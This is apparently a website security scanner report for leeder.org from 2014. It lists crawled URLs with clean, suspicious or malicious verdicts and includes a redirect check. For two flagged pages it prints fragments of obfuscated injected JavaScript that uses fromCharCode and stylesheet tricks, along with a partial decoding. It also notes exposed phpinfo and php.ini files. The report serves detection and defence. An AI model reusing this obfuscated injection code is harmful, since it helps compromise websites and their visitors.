Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=leeder.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://leeder.org/ | 200 OK Content-Length: 551 Content-Type: text/html | clean |
http://leeder.org/404.shtml | 200 OK Content-Length: 251 Content-Type: text/html | clean |
http://leeder.org/test404page.js | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
http://leeder.org/Backup/ | 200 OK Content-Length: 23017 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var Decoded script: function () { var nC = 24508; var vI = new Array; this.yC = false; this.zK = "zK"; var sN = 59341; eG.q(); var eQ = new Date; var lD = function () {}; var dT = false; pP = ""; this.eGB = ""; mK = "mK"; var sD = function () {return "sD";}; var rT = ""; } /*** called setTimeout with function () { var nC = 24508; var vI = new Array; this.yC = false; this.zK = "zK"; var sN = 59341; eG.q(); var eQ = new Date; var lD = function () {}; var dT = false; pP = ""; this.eGB = ""; mK = "mK"; var sD = function () {return "sD";}; var rT = ""; }, 342 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://leeder.org/Backup/../cpanel | 200 OK Content-Length: 8889 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: cpanel.leeder.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <title>cPanel Redirect</title> <style type="text/css"> .statusBox { width: 80px; } .fb { width:43%; float:left; text-align:center; margin:5px 20px 5px 20p ...[4374 bytes skipped]... | ||
http://leeder.org/Backup/../webmail | 200 OK Content-Length: 8894 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: webmail.leeder.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <title>cPanel Redirect</title> <style type="text/css"> .statusBox { width: 80px; } .fb { width:43%; float:left; text-align:center; margin:5px 20px 5px 20px ...[4373 bytes skipped]... | ||
http://leeder.org/cgi-bin/ | 403 Forbidden Content-Length: 228 Content-Type: text/html | clean |
http://leeder.org/index_oster.htm | 200 OK Content-Length: 22546 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var Decoded script: function () { var nC = 24508; var vI = new Array; this.yC = false; this.zK = "zK"; var sN = 59341; eG.q(); var eQ = new Date; var lD = function () {}; var dT = false; pP = ""; this.eGB = ""; mK = "mK"; var sD = function () {return "sD";}; var rT = ""; } /*** called setTimeout with function () { var nC = 24508; var vI = new Array; this.yC = false; this.zK = "zK"; var sN = 59341; eG.q(); var eQ = new Date; var lD = function () {}; var dT = false; pP = ""; this.eGB = ""; mK = "mK"; var sD = function () {return "sD";}; var rT = ""; }, 342 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://leeder.org/php.ini | 200 OK Content-Length: 39384 Content-Type: text/plain | clean |
http://leeder.org/php.ini.bak.ext.07_25_14 | 200 OK Content-Length: 39328 Content-Type: application/vnd.novadigm.ext | clean |
http://leeder.org/phpinfo.php | 200 OK Content-Length: 74932 Content-Type: text/html | clean |
http://leeder.org/phpinfo.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | 200 OK Content-Length: 14077 Content-Type: text/html | clean |
http://leeder.org/function.phpinfo | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
http://leeder.org/robots.txt | 200 OK Content-Length: 473 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: leeder.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:38:21 GMT
Server: Apache
Content-Length: 551
Content-Type: text/html;charset=ISO-8859-1
...551 bytes of data.
GET / HTTP/1.1
Host: leeder.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:38:21 GMT
Server: Apache
Content-Length: 551
Content-Type: text/html;charset=ISO-8859-1
...551 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: leeder.org
Referer: http://www.google.com/search?q=leeder.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: leeder.org
Referer: http://www.google.com/search?q=leeder.org
Result:
The result is similar to the first query. There are no suspicious redirects found.